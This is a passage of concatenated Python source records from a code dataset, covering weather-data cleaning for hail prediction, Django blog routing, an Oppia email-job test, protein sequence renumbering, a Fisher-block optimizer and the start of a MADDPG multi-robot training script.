'fehlwerteLufttemperaturMax' : feldbergWetter.LufttemperaturMax==-999.0,\n 'fehlwerteLufttemperaturMin2m' : feldbergWetter.LufttemperaturMin2m==-999.0,\n 'fehlwerteLufttemperaturMin5cm' : feldbergWetter.LufttemperaturMin5cm==-999.0,\n 'fehlwerteHagel' : feldbergWetter.Hagel==-999.0\n}\ndf_Fehlwerte = pd.DataFrame(fehlwerteInSpalten)\n# Gives the number of missing values in each column\n#print(df_Fehlwerte.sum())\n\n# Drop the column WindstaerkeMittel because of too many missing values\n#feldbergWetter = feldbergWetter.drop(columns=['WindstaerkeMittel'])\n\n\n# various plots of the weather data\n\"\"\"\nplt.subplot(1, 3, 1, title = 'Windstaerke Max')\n#plt.plot(feldbergWetter.index, feldbergWetter['Schneehoehe'])\nplt.plot(feldbergWetter.index, feldbergWetter['WindstaerkeMax'])\nplt.subplot(1, 3, 2, title = 'Windstaerke Mittel')\nplt.plot(feldbergWetter.index, feldbergWetter['WindstaerkeMittel'])\nplt.subplot(1, 3, 3, title = 'Hagel')\nplt.plot(feldbergWetter.index, feldbergWetter['Hagel'])\n#plt.plot(feldbergWetter.index[1000:1100], feldbergWetter['WindstaerkeMax'][1000:1100])\nplt.show()\n\"\"\"\n\n# various boxplots to look for possible relationships\n\"\"\"\nfig, ax = plt.subplots(1, 3)\nsns.boxplot(x='Hagel', y='Niederschlagshoehe', data=feldbergWetter, ax=ax[0])\nsns.boxplot(x='Hagel', y='Bewoelkung', data=feldbergWetter, ax=ax[1])\nsns.boxplot(x='Hagel', y='RelativeFeuchteMittel', data=feldbergWetter, ax=ax[2])\nplt.show()\n\"\"\"\n\n# Check whether a correlation between the columns is apparent\n#print(feldbergWetter.corr())\n\n# Drop the column WindstaerkeMittel because of too many missing values\nfeldbergWetter = feldbergWetter.drop(columns=['WindstaerkeMittel'])\n\n# Delete all rows up to 1955-01-01\nfeldbergWetter.drop(feldbergWetter.loc['1949-01-01':'1954-12-31'].index, inplace=True)\n\n# Replace missing values\nfeldbergWetter.replace(-999.0, np.nan, inplace=True)\n# NaN values are replaced by linear interpolation between the preceding and following values in the column\nfeldbergWetter.interpolate(inplace=True)\n\n# Plot WindstaerkeMax with the cleaned values\n\"\"\"\nplt.plot(feldbergWetter.index, feldbergWetter['WindstaerkeMax'])\nplt.xlabel('Datum')\nplt.ylabel('Windstaerke')\nplt.show()\n\"\"\"\n\n# Boxplots comparing the columns against Hagel\n\"\"\"\nfig, ax = plt.subplots(2, 6)\nsns.boxplot(x='Hagel', y='WindstaerkeMax', data=feldbergWetter, ax=ax[0, 0])\nsns.boxplot(x='Hagel', y='Niederschlagshoehe', data=feldbergWetter, ax=ax[0, 1])\nsns.boxplot(x='Hagel', y='Niederschlagsform', data=feldbergWetter, ax=ax[0, 2])\nsns.boxplot(x='Hagel', y='Sonnenscheindauer', data=feldbergWetter, ax=ax[0, 3])\nsns.boxplot(x='Hagel', y='Schneehoehe', data=feldbergWetter, ax=ax[0, 4])\nsns.boxplot(x='Hagel', y='Bewoelkung', data=feldbergWetter, ax=ax[0, 5])\nsns.boxplot(x='Hagel', y='DampfdruckMittel', data=feldbergWetter, ax=ax[1, 0])\nsns.boxplot(x='Hagel', y='LuftdruckMittel', data=feldbergWetter, ax=ax[1, 1])\nsns.boxplot(x='Hagel', y='TemperaturMittel', data=feldbergWetter, ax=ax[1, 2])\nsns.boxplot(x='Hagel', y='RelativeFeuchteMittel', data=feldbergWetter, ax=ax[1, 3])\nsns.boxplot(x='Hagel', y='LufttemperaturMax', data=feldbergWetter, ax=ax[1, 4])\nsns.boxplot(x='Hagel', y='LufttemperaturMin2m', data=feldbergWetter, ax=ax[1, 5])\nplt.show()\n\"\"\"\n\n# X will be a pandas dataframe of all columns except Hagel\nX = feldbergWetter[[col for col in feldbergWetter.columns if col != 'Hagel']]\n\n# y will be a pandas series of the Hagel column\ny = feldbergWetter['Hagel']\n\n# split data into a training set and a temporary set using sklearn.model_selection.train_test_split\n#X_train, X_tmp, y_train, y_tmp = train_test_split(X, y, test_size=0.2, random_state=23)\nX_train, X_tmp, y_train, y_tmp = train_test_split(X, y, test_size=0.2, shuffle=False)\n\n# take the remaining 20% of data in X_tmp, y_tmp and split them evenly\n#X_test, X_val, y_test, y_val = train_test_split(X_tmp, y_tmp, test_size=0.5, random_state=23)\nX_test, X_val, y_test, y_val = train_test_split(X_tmp, y_tmp, test_size=0.5, shuffle=False)\n\nX_train.shape, X_test.shape, X_val.shape\nprint(\"Training instances {}, Training features {}\".format(X_train.shape[0], X_train.shape[1]))\nprint(\"Validation instances {}, Validation features {}\".format(X_val.shape[0], X_val.shape[1]))\nprint(\"Testing instances {}, Testing features {}\".format(X_test.shape[0], X_test.shape[1]))\n\nprint(X_train.head(5))","sub_path":"Feldberg_Analyse_DatenSplitten.py","file_name":"Feldberg_Analyse_DatenSplitten.py","file_ext":"py","file_size_in_byte":7978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
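The split in the entry above deliberately passes shuffle=False, so the validation and test sets are the most recent observations rather than a random sample, which avoids leakage for time-ordered weather data. A minimal, self-contained sketch of the same chronological 80/10/10 split on a synthetic frame (the column values here are made up, not the real DWD data):

import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split

df = pd.DataFrame({
    'WindstaerkeMax': np.random.rand(100),
    'Niederschlagshoehe': np.random.rand(100),
    'Hagel': np.random.randint(0, 2, 100),
})
X = df.drop(columns=['Hagel'])
y = df['Hagel']

# First cut: oldest 80% for training, newest 20% held out.
X_train, X_tmp, y_train, y_tmp = train_test_split(X, y, test_size=0.2, shuffle=False)
# Second cut: split the held-out 20% evenly into test and validation.
X_test, X_val, y_test, y_val = train_test_split(X_tmp, y_tmp, test_size=0.5, shuffle=False)

assert len(X_train) == 80 and len(X_test) == 10 and len(X_val) == 10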
+{"seq_id":"100002216","text":"from django.conf.urls import include, url\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.views.generic import TemplateView\r\nfrom .views.admin import auth\r\nfrom .views.admin.PostView import PostView\r\nfrom .views.admin.CategoryView import CategoryView\r\nfrom .views.admin.ImageView import ImageView\r\nfrom .views.blog.PostListView import PostListView\r\nfrom .views.blog.PostDetailView import PostDetailView\r\nfrom .app.posts_table import PostsTable\r\nfrom .app.categories_table import CategoriesTable\r\nfrom itertools import chain\r\n\r\nroutes = {\r\n# 'blog': [\r\n# url(r'^$', blog.index, name='index'),\r\n# url(r'^posts/(?P[0-9]+)/(?P[0-9]+)$', blog.index, name='index'),\r\n# url(r'^post/(?P[0-9]+)/$', blog.post, name='post'),\r\n# url(r'^category/(?P[0-9]+)/$', blog.category, name='category'),\r\n# ],\r\n 'blog': [\r\n url(r'^$', PostListView.as_view()),\r\n url(r'^post/(?P[0-9]+)/$', PostDetailView.as_view()),\r\n ],\r\n 'admin_auth': [\r\n url(r'^admin/$', auth.index, name='admin.index'),\r\n url(r'^admin/auth/attempt/$', auth.attempt, name='admin.auth.attempt'),\r\n url(r'^admin/auth/logout/$', auth.log_out, name='admin.auth.logout'),\r\n url(r'^admin/auth/dashboard/$', auth.dashboard, name='admin.auth.dashboard'),\r\n ],\r\n 'posts': [\r\n url(r'^admin/posts/index/$', login_required(\r\n TemplateView.as_view(template_name='_admin/posts/index.html')),\r\n name='admin.post.index'\r\n ),\r\n url(r'^admin/posts/$', login_required(PostView.as_view()), name='admin.post'),\r\n url(r'^admin/posts/table/$', login_required(PostsTable.as_view()), name='admin.post.table'),\r\n ],\r\n 'category': [\r\n url(r'^admin/categories/index/$', login_required(\r\n TemplateView.as_view(template_name='_admin/categories/index.html')),\r\n name='admin.category.index'\r\n ),\r\n url(r'^admin/categories/$', login_required(CategoryView.as_view()), name='admin.category'),\r\n url(r'^admin/categories/table/$', login_required(CategoriesTable.as_view()), name='admin.category.table'),\r\n ],\r\n 'image': [\r\n url(r'^admin/images/index/$', login_required(\r\n TemplateView.as_view(template_name='_admin/images/index.html')),\r\n name='admin.image.index'\r\n ),\r\n url(r'^admin/images/$', login_required(ImageView.as_view()), name='admin.image')\r\n ]\r\n}\r\n\r\nurlpatterns = list(chain(*routes.values()))\r\n\r\n#urlpatterns = [\r\n# url(r'^$', blog.index, name='index'),\r\n# url(r'^posts/(?P[0-9]+)/(?P[0-9]+)$', blog.index, name='index'),\r\n# url(r'^post/(?P[0-9]+)/$', blog.post, name='post'),\r\n# url(r'^category/(?P[0-9]+)/$', blog.category, name='category'),\r\n# \r\n# url(r'^admin/$', auth.index, name='admin.index'),\r\n# url(r'^admin/auth/attempt/$', auth.attempt, name='admin.auth.attempt'),\r\n# url(r'^admin/auth/logout/$', auth.log_out, name='admin.auth.logout'),\r\n#]\r\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"66250241","text":"# coding: utf-8\n#\n# Copyright 2014 The Oppia Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for Email-related jobs.\"\"\"\n\nimport datetime\nimport types\n\nfrom core.domain import email_jobs_one_off\nfrom core.platform import models\nfrom core.tests import test_utils\nimport feconf\n\n(email_models,) = models.Registry.import_models([models.NAMES.email])\n\ntaskqueue_services = models.Registry.import_taskqueue_services()\n\n\nclass EmailHashRegenerationOneOffJobTests(test_utils.GenericTestBase):\n \"\"\"Tests for the one-off update hash job.\"\"\"\n\n def _run_one_off_job(self):\n \"\"\"Runs the one-off MapReduce job.\"\"\"\n job_id = email_jobs_one_off.EmailHashRegenerationOneOffJob.create_new()\n email_jobs_one_off.EmailHashRegenerationOneOffJob.enqueue(job_id)\n self.assertEqual(\n self.count_jobs_in_taskqueue(\n taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)\n self.process_and_flush_pending_tasks()\n\n def test_hashes_get_generated(self):\n # pylint: disable=unused-argument\n def _generate_hash_for_tests(\n cls, recipient_id, email_subject, email_body):\n \"\"\"Generates hash for tests.\n\n Args:\n recipient_id: str. ID of the recipient.\n email_subject: str. Subject of the email.\n email_body: str. Body of the email.\n\n Returns:\n str. 
Empty if recipient_id is 'recipient_id2', None if\n 'recipient_id1' and 'Email Hash' otherwise.\n \"\"\"\n\n if recipient_id == 'recipient_id1':\n return None\n elif recipient_id == 'recipient_id2':\n return ''\n return 'Email Hash'\n\n generate_constant_hash_ctx = self.swap(\n email_models.SentEmailModel, '_generate_hash',\n types.MethodType(\n _generate_hash_for_tests,\n email_models.SentEmailModel))\n\n with generate_constant_hash_ctx:\n email_models.SentEmailModel.create(\n 'recipient_id1', 'recipient@email.com', 'sender_id',\n 'sender@email.com', feconf.EMAIL_INTENT_SIGNUP,\n 'Email Subject', 'Email Body', datetime.datetime.utcnow())\n\n email_models.SentEmailModel.create(\n 'recipient_id2', 'recipient@email.com', 'sender_id',\n 'sender@email.com', feconf.EMAIL_INTENT_SIGNUP,\n 'Email Subject', 'Email Body', datetime.datetime.utcnow())\n\n email_models.SentEmailModel.create(\n 'recipient_id3', 'recipient@email.com', 'sender_id',\n 'sender@email.com', feconf.EMAIL_INTENT_SIGNUP,\n 'Email Subject', 'Email Body', datetime.datetime.utcnow())\n\n # Check that all the emails were recorded in SentEmailModel.\n all_models = email_models.SentEmailModel.get_all().fetch()\n self.assertEqual(len(all_models), 3)\n\n for model in all_models:\n if model.recipient_id == 'recipient_id1':\n self.assertIsNone(model.email_hash)\n elif model.recipient_id == 'recipient_id2':\n self.assertEqual(len(model.email_hash), 0)\n\n self._run_one_off_job()\n\n # Check that all the emails that were recorded in SentEmailModel\n # are still present.\n all_models = email_models.SentEmailModel.get_all().fetch()\n self.assertEqual(len(all_models), 3)\n\n all_models = email_models.SentEmailModel.get_all().fetch()\n\n for model in all_models:\n self.assertIsNotNone(model.email_hash)\n","sub_path":"core/domain/email_jobs_one_off_test.py","file_name":"email_jobs_one_off_test.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
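The test above swaps out SentEmailModel._generate_hash by binding a plain function to the class with types.MethodType, so the first argument behaves like cls. A generic, self-contained sketch of that binding trick (the class and stub here are made up for illustration, not Oppia code):

import types

class Mailer:
    @classmethod
    def _generate_hash(cls, recipient_id):
        return 'real-hash-' + recipient_id

def _fake_hash(cls, recipient_id):
    # Mirrors the test stub: different recipients trigger different branches.
    return None if recipient_id == 'r1' else 'fake-hash'

original = Mailer._generate_hash
# Binding the function to the class makes it receive Mailer as `cls`.
Mailer._generate_hash = types.MethodType(_fake_hash, Mailer)
assert Mailer._generate_hash('r1') is None
assert Mailer._generate_hash('r2') == 'fake-hash'
Mailer._generate_hash = original  # restore, as the swap context manager does on exit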
+{"seq_id":"342819781","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport gemmi\nimport csv\nfrom conkit import io as ckio\nfrom conkit import core as ckc\n\n\nfrom .inputvalues import CSV_CHAIN_PATH\nfrom .init2 import pdbid\nfrom .init2 import ressymbol\nfrom .output import output_tmpdir\nfrom .output import printout\n#########################################################\n##### SEQUENCE-RELATED FUNCTIONS ########################\n\n# INTERFACE PDB CROPPING AND RENUMBERING\ndef renumberpdbs(PDBINT_PATH, fastaseq,itisbio=False,outdir=output_tmpdir(\"pisacov\")):\n \"\"\"\n INTERFACE PDB CROPPING AND RENUMBERING\n\n Parameters\n ----------\n PDBINT_PATH : str\n Input path.\n fastaseq : ConKit sequence\n Full fasta sequence from PDB database\n itisbio : bool\n Use limits given by SIFTS (True) or whole sequence (False) (def: False)\n\n Returns\n -------\n None\n\n \"\"\"\n n_chains = 0\n n_resmax = 0\n pdb_structure = gemmi.read_structure(PDBINT_PATH)\n\n for model in pdb_structure:\n n_chains += len(model)\n for chain in model:\n if len(chain) > n_resmax:\n n_resmax = len(chain)\n\n pos = [[0 for j in range(n_resmax)] for i in range(n_chains)]\n\n n_chains = 0\n\n ninterface=(os.path.splitext(os.path.splitext(PDBINT_PATH)[0])[1])[1:]\n printout('INTERFACE: ' + str(ninterface))\n for model in pdb_structure:\n for chain in model:\n solved = False\n for shift in range(int(len(chain)/2)):\n cnt=0\n gap=0\n score=0\n newseq=''\n newseq += '-'*shift\n for residue in chain:\n if residue == chain[0]:\n if ressymbol(residue.name) == fastaseq.seq[shift]:\n score += 1\n pos[n_chains][cnt]=1+shift\n newseq += ressymbol(residue.name)\n else:\n if (chain[cnt].seqid.num-chain[cnt-1].seqid.num > 1):\n gap += (chain[cnt].seqid.num-chain[cnt-1].seqid.num-1)\n newseq += '-'*(chain[cnt].seqid.num-chain[cnt-1].seqid.num-1)\n pos[n_chains][cnt]=cnt+1+gap+shift\n if ressymbol(residue.name) == fastaseq.seq[cnt+gap+shift]:\n score += 1\n newseq += ressymbol(residue.name)\n if residue==chain[-1]:\n if cnt+gap+shift+1 < len(fastaseq.seq):\n newseq += '-'*(len(fastaseq.seq)-(cnt+gap+shift+1))\n cnt += 1\n if score == len(chain):\n solved = True\n printout('ALIGNMENT OF CHAIN ' + str(n_chains+1))\n printout(fastaseq.seq)\n printout(newseq, extraline=True)\n break\n if solved:\n cnt=0\n for residue in chain:\n residue.seqid.num = pos[n_chains][cnt]\n cnt += 1\n n_chains += 1\n solved = False\n\n PDBINT_PATH_OUT=os.path.join(outdir, os.path.splitext(os.path.basename(PDBINT_PATH))[0]+\".fasta.pdb\")\n pdb_structure.write_pdb(PDBINT_PATH_OUT)\n\n if itisbio:\n PDBINT_PATH_OUT=os.path.join(outdir, os.path.splitext(os.path.basename(PDBINT_PATH))[0]+\".bio.fasta.pdb\")\n\n n_chains = 0\n n_resmax = 0\n for model in pdb_structure:\n n_chains += len(model)\n for chain in model:\n if len(chain) > n_resmax:\n n_resmax = len(chain)\n delres = [[False for j in range(n_resmax)] for i in range(n_chains)]\n n_chains = 0\n for model in pdb_structure:\n for chain in model:\n r=0\n newresnum=1\n fastaends=biochain_ends('fasta')\n for residue in chain:\n if residue.seqid.num < fastaends[0]:\n delres[n_chains][r] = True\n elif residue.seqid.num > fastaends[1]:\n delres[n_chains][r] = True\n elif residue.seqid.num == fastaends[0]:\n prev_res_num = residue.seqid.num\n residue.seqid.num = 1\n else:\n if residue == chain[0]:\n prev_res_num = residue.seqid.num\n residue.seqid.num = residue.seqid.num - fastaends[0] + 1\n else:\n if (residue.seqid.num - prev_res_num == 0 ): # SEQUENCE NUMBERS INSERTED (1A, 1B, 1C, ...)\n newresnum += 1\n 
prev_res_num = residue.seqid.num\n residue.seqid.num = newresnum\n elif (residue.seqid.num - prev_res_num == 1 ): # SEQUENCE NUMBERS ARE CONSECUTIVE\n newresnum += 1\n prev_res_num = residue.seqid.num\n residue.seqid.num = newresnum\n elif (residue.seqid.num - prev_res_num > 1 ): # SEQUENCE NUMBERS SHOW GAPS\n newresnum += residue.seqid.num- prev_res_num\n prev_res_num = residue.seqid.num\n residue.seqid.num = newresnum\n else:\n print('residue : ' + str(residue.seqid.num))\n print('previous: ' + str(prev_res_num))\n printout(' ERROR: Sequence numbers not sorted',extraline=True, errorlog=True)\n r += 1\n n_chains += 1\n\n n_chains = 0\n for model in pdb_structure:\n for chain in model:\n for res in reversed(range(len(chain))):\n if delres[n_chains][res]:\n del chain[res]\n n_chains += 1\n\n pdb_structure.write_pdb(PDBINT_PATH_OUT)\n\ndef biochain_ends(which):\n \"\"\"\n RETRIEVE SEQUENCE POSITION OF BIOLOGICAL PROTEIN CHAIN ENDS FROM CSV FILE (SIFTS)\n\n Parameters\n ----------\n which : str\n Either 'fasta' or 'pdb'\n\n Returns\n -------\n resends : list(int), dim=2\n The position (sequence numbers) of the biological ends at the pdb file\n\n \"\"\"\n\n #pdbid=os.path.splitext(os.path.basename(PDB_PATH))[0]\n csv_chain_file = open(CSV_CHAIN_PATH)\n csv_chain = csv.reader(csv_chain_file)\n\n resends = [0 for i in range(2)]\n\n for entry in csv_chain:\n if entry[0] == pdbid() and entry[1]==\"A\":\n if which == 'fasta':\n resends[0]=int(entry[3])\n resends[1]=int(entry[4])\n elif which == 'pdb':\n resends[0]=int(entry[7])\n resends[1]=int(entry[8])\n break\n return resends\n\n\ndef crop_fasta(fastaseq, outdir=output_tmpdir()):\n \"\"\"\n FASTA SEQUENCE CROPPING\n\n Parameters\n ----------\n seqpath : ConKit Sequence\n Source fasta sequence\n outdir : str, optional\n Directory where results biological sequence will be printed out. The default is output_tmpdir().\n\n Returns\n -------\n bioseq : ConKit Sequence\n Cropped (biological) sequence\n newseqpath : str\n Sequence path (bio.fasta file)\n\n \"\"\"\n # Obtain new chain ends (residue number)\n fastaends = biochain_ends('fasta')\n\n # Check that the sequence is consistent with the limits retrieved from the database\n if fastaends[1]-fastaends[0] + 1 > fastaseq.seq_len:\n isitbio=False\n printout('WARNING: The biological sequence limits include a section greater than the input sequence.', errorlog=True)\n printout(' Skipping cropping. Returning input values.', errorlog=True,extraline=True)\n bioseq = fastaseq\n newseqfile = pdbid() + '.fasta'\n newseqpath = os.path.join(outdir, newseqfile)\n elif fastaends[1]-fastaends[0] + 1 == fastaseq.seq_len:\n isitbio=True\n printout(' Biological and input sequences have the same length. Skipping cropping. Returning input values.',extraline=True)\n bioseq = fastaseq\n newseqfile = pdbid() + '.bio.fasta'\n newseqpath = os.path.join(outdir, newseqfile)\n ckio.write(newseqpath,\"fasta\",hierarchy=bioseq)\n else:\n if fastaends[0] > fastaseq.seq_len:\n isitbio=False\n printout('WARNING: The sequence upper limit imported from the database is higher than the upper limit from the fasta file.',errorlog=True) #LOGGING\n printout(' Skipping cropping. 
Returning input values.', errorlog=True,extraline=True)\n bioseq = fastaseq\n newseqfile = pdbid() + '.fasta'\n newseqpath = os.path.join(outdir, newseqfile)\n else:\n isitbio=True\n # Append new info to sequence\n newid=fastaseq.id\n newid = newid +\"|NO_CLONING_ARTIFACTS\"\n\n # Create new sequence\n newseq=fastaseq.seq[fastaends[0]-1:fastaends[1]-1]\n bioseq=ckc.Sequence(newid, newseq)\n\n # Write new sequence to file\n #locpdbid=os.path.splitext(os.path.basename(PDB_PATH))[0]\n #outdir = os.path.join(OUTPUT_DIR, locpdbid,\"\")\n\n newseqfile = pdbid() + '.bio.fasta'\n newseqpath = os.path.join(outdir, newseqfile)\n\n ckio.write(newseqpath,\"fasta\",hierarchy=bioseq)\n\n return bioseq, newseqpath, isitbio\n\ndef biofile(itisbio):\n \"\"\"\n Returns string containing \".bio\" or empty string depending on fasta sequence employed\n\n Parameters\n ----------\n itisbio : bool\n Contains information about the nature of fasta sequence.\n\n Returns\n -------\n bio_path : str\n Either \".bio\" or empty string.\n\n \"\"\"\n if itisbio:\n bio_path='.bio'\n else:\n bio_path=''\n\n return bio_path","sub_path":"pisacov/pisacovmods/sequence_ok.py","file_name":"sequence_ok.py","file_ext":"py","file_size_in_byte":10067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
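Because crop_fasta converts 1-based SIFTS limits into Python slice indices, the bounds deserve a second look. A pure-Python sketch with a toy sequence (the limits below are hypothetical): for inclusive 1-based limits (start, end) the conventional slice is seq[start-1:end], so the seq[fastaends[0]-1:fastaends[1]-1] form used above drops the final residue unless the stored end value is already exclusive.

seq = 'MKTAYIAKQR'
start, end = 3, 7                          # hypothetical 1-based inclusive limits
cropped_inclusive = seq[start - 1:end]     # 'TAYIA' - keeps residue `end`
cropped_as_above = seq[start - 1:end - 1]  # 'TAYI'  - silently drops it
print(cropped_inclusive, cropped_as_above)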
+{"seq_id":"25905564","text":"from torch import einsum, eye, matmul, ones_like, norm\nfrom torch.linalg import inv\n\nfrom backpack.core.derivatives.linear import LinearDerivatives\nfrom backpack.extensions.firstorder.fisher_block.fisher_block_base import FisherBlockBase\n\n\nclass FisherBlockLinear(FisherBlockBase):\n def __init__(self, damping=1.0, alpha=0.95):\n self.damping = damping\n self.alpha = alpha\n super().__init__(derivatives=LinearDerivatives(), params=[\"bias\", \"weight\"])\n\n def weight(self, ext, module, g_inp, g_out, backproped):\n # print(g_out)\n\n # check if there are stored variables:\n # if hasattr(module, \"I\"):\n # this is a sampling technique\n # inp = module.I\n # l = inp.shape[0]\n # prob = 0.1\n # l_new = int(np.floor(prob * l))\n\n # # print('input to linear layer before droput:', inp.shape)\n # Borg = einsum(\"ni,li->nl\", (inp, inp)) \n\n # if inp.shape[1] > 7000:\n # inp = inp[:, torch.randint(l, (l_new,))] \n\n # B = einsum(\"ni,li->nl\", (inp, inp)) / ( prob)\n \n\n\n\n I = module.input0\n n = g_out[0].shape[0]\n g_out_sc = n * g_out[0]\n G = g_out_sc\n grad = module.weight.grad\n \n \n B = einsum(\"ni,li->nl\", (I, I)) \n A = einsum(\"no,lo->nl\", (G, G))\n\n # compute vector jacobian product in optimization method\n grad_prod = einsum(\"ni,oi->no\", (I, grad))\n grad_prod = einsum(\"no,no->n\", (grad_prod, G))\n # grad_prod = 0\n out = A * B \n # out = 0\n NGD_kernel = out / n\n NGD_inv = inv(NGD_kernel + self.damping * eye(n).to(grad.device))\n v = matmul(NGD_inv, grad_prod.unsqueeze(1)).squeeze()\n\n gv = einsum(\"n,no->no\", (v, G))\n gv = einsum(\"no,ni->oi\", (gv, I))\n gv = gv / n\n\n update = (grad - gv)/self.damping\n # update = grad\n\n # store for later use:\n # module.A = A\n # module.B = B\n # module.out = out\n module.I = I\n module.G = G\n module.NGD_inv = NGD_inv\n return (out, grad_prod, update)\n \n\n\n def bias(self, ext, module, g_inp, g_out, backproped):\n\n grad = module.bias.grad\n n = g_out[0].shape[0]\n g_out_sc = n * g_out[0]\n\n # compute vector jacobian product in optimization method\n grad_prod = einsum(\"no,o->n\", (g_out_sc, grad))\n # grad_prod = 0\n out = einsum(\"no,lo->nl\", g_out_sc, g_out_sc)\n # out = 0\n\n\n NGD_kernel = out / n\n NGD_inv = inv(NGD_kernel + self.damping * eye(n).to(grad.device))\n v = matmul(NGD_inv, grad_prod.unsqueeze(1)).squeeze()\n gv = einsum(\"n,no->o\", (v, g_out_sc))\n gv = gv / n\n\n update = (grad - gv)/self.damping\n # update = grad\n\n return (out, grad_prod, update)\n \n\n","sub_path":"backpack/extensions/firstorder/fisher_block/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"423882013","text":"#!/usr/bin/env python\n# ROS\nimport rospy\n\n# Env\nimport os\nimport numpy as np\nimport random, collections\nimport math\nimport time\nimport argparse\n\n# RL training\nfrom copy import deepcopy\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom collections import namedtuple\n\n# Parameter\nfrom easydict import EasyDict\nimport json\n\n# Tensorboard\nfrom torch.utils.tensorboard import SummaryWriter\n\n# Utils\nimport Utils\nfrom Env import Gazebo_Env\nfrom Train_Utils import soft_update, hard_update, OrnsteinUhlenbeckProcess\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model_path', type=str, default=None)\nparser.add_argument('--test', type=bool, default=False)\nargs = parser.parse_args()\n\n##############################################################################\n#Hyperparameters\nif (args.model_path == None):\n config = EasyDict({\n \"start_epi\" : 0,\n \"n_agents\" : 2,\n \"n_targets\" : 1,\n \"dim_obs\" : 25,\n \"dim_act\" : 3,\n \"batch_size\" : 1024,\n \"capacity\" : 1000000,\n \"lr_ac\" : 0.0001,\n \"lr_cr\" : 0.001,\n \"gamma\" : 0.95,\n \"first_hidden_layer\" : 128,\n \"second_hidden_layer\" : 64,\n \"tau\" : 0.01, # for target network soft update\n \"delay_step\" : 10,\n \"n_episode\" : 2000,\n \"episodes_before_train\" : 0,\n \"dim_laser\" : 100\n })\nelse:\n json_path = args.model_path + \"/config.json\"\n json_file = open(json_path)\n json_data = json.load(json_file)\n \n config = EasyDict({\n \"start_epi\" : json_data[\"start_epi\"],\n \"n_agents\" : json_data[\"n_agents\"],\n \"n_targets\" : json_data[\"n_targets\"],\n \"dim_obs\" : json_data[\"dim_obs\"],\n \"dim_act\" : json_data[\"dim_act\"],\n \"batch_size\" : json_data[\"batch_size\"],\n \"capacity\" : json_data[\"capacity\"],\n \"lr_ac\" : json_data[\"lr_ac\"],\n \"lr_cr\" : json_data[\"lr_cr\"],\n \"gamma\" : json_data[\"gamma\"],\n \"first_hidden_layer\" : json_data[\"first_hidden_layer\"],\n \"second_hidden_layer\" : json_data[\"second_hidden_layer\"],\n \"tau\" : json_data[\"tau\"], # for target network soft update\n \"delay_step\" : json_data[\"delay_step\"],\n \"n_episode\" : json_data[\"n_episode\"],\n \"episodes_before_train\" : json_data[\"episodes_before_train\"],\n \"dim_laser\" : json_data[\"dim_laser\"]\n })\n\n\n##############################################################################################################\n# MADDPG Random Process\nclass MADDPG:\n def __init__(self, n_agents, dim_obs, dim_act, dim_laser, batch_size, first_hidden_layer, second_hidden_layer,\n capacity, episodes_before_train, gamma, tau, lr_cr, lr_ac):\n\n self.actors = [Actor(dim_obs, dim_act, dim_laser, first_hidden_layer, second_hidden_layer) for i in range(n_agents)]\n self.critics = [Critic(n_agents, dim_obs, dim_act, dim_laser, first_hidden_layer, second_hidden_layer) for i in range(n_agents)]\n\n self.actors_target = deepcopy(self.actors)\n self.critics_target = deepcopy(self.critics)\n\n self.n_agents = n_agents\n self.n_states = dim_obs\n self.n_actions = dim_act\n self.n_laser = dim_laser\n self.memory = ReplayMemory(capacity)\n self.batch_size = batch_size\n self.use_cuda = torch.cuda.is_available()\n self.episodes_before_train = episodes_before_train\n\n self.GAMMA = gamma\n self.tau = tau\n\n self.var = [1.0 for i in range(n_agents)]\n cnt = 0\n if (args.test == False):\n while (self.var[0] > 0.05 and cnt < config.start_epi - episodes_before_train):\n for i in range(len(self.var)):\n self.var[i] *= 
0.999998\n cnt += 1\n \n self.critic_optimizer = [optim.Adam(x.parameters(), lr=lr_cr) for x in self.critics]\n self.actor_optimizer = [optim.Adam(x.parameters(), lr=lr_ac) for x in self.actors]\n\n if self.use_cuda:\n for x in self.actors:\n x.cuda()\n for x in self.critics:\n x.cuda()\n for x in self.actors_target:\n x.cuda()\n for x in self.critics_target:\n x.cuda()\n\n self.steps_done = 0\n self.episode_done = 0\n\n def update_policy(self):\n # do not train until exploration is enough\n if self.episode_done <= self.episodes_before_train:\n return None, None\n\n BoolTensor = torch.cuda.BoolTensor if self.use_cuda else torch.BoolTensor\n FloatTensor = torch.cuda.FloatTensor if self.use_cuda else torch.FloatTensor\n\n c_loss = []\n a_loss = []\n for agent in range(self.n_agents):\n transitions = self.memory.sample(self.batch_size)\n batch = Experience(*zip(*transitions))\n non_final_mask = BoolTensor(list(map(lambda s: s is not None, batch.next_states)))\n\n # state_batch: batch_size x n_agents x dim_obs\n state_batch = torch.stack(batch.states).type(FloatTensor)\n laser_batch = torch.stack(batch.laser).type(FloatTensor)\n action_batch = torch.stack(batch.actions).type(FloatTensor)\n reward_batch = torch.stack(batch.rewards).type(FloatTensor)\n\n # : (batch_size_non_final) x n_agents x dim_obs\n non_final_next_states = torch.stack([s for s in batch.next_states if s is not None]).type(FloatTensor)\n non_final_next_lasers = torch.stack([l for l in batch.next_laser if l is not None]).type(FloatTensor)\n\n # for current agent\n whole_state = state_batch.view(self.batch_size, -1)\n whole_laser = laser_batch.view(self.batch_size, -1)\n whole_action = 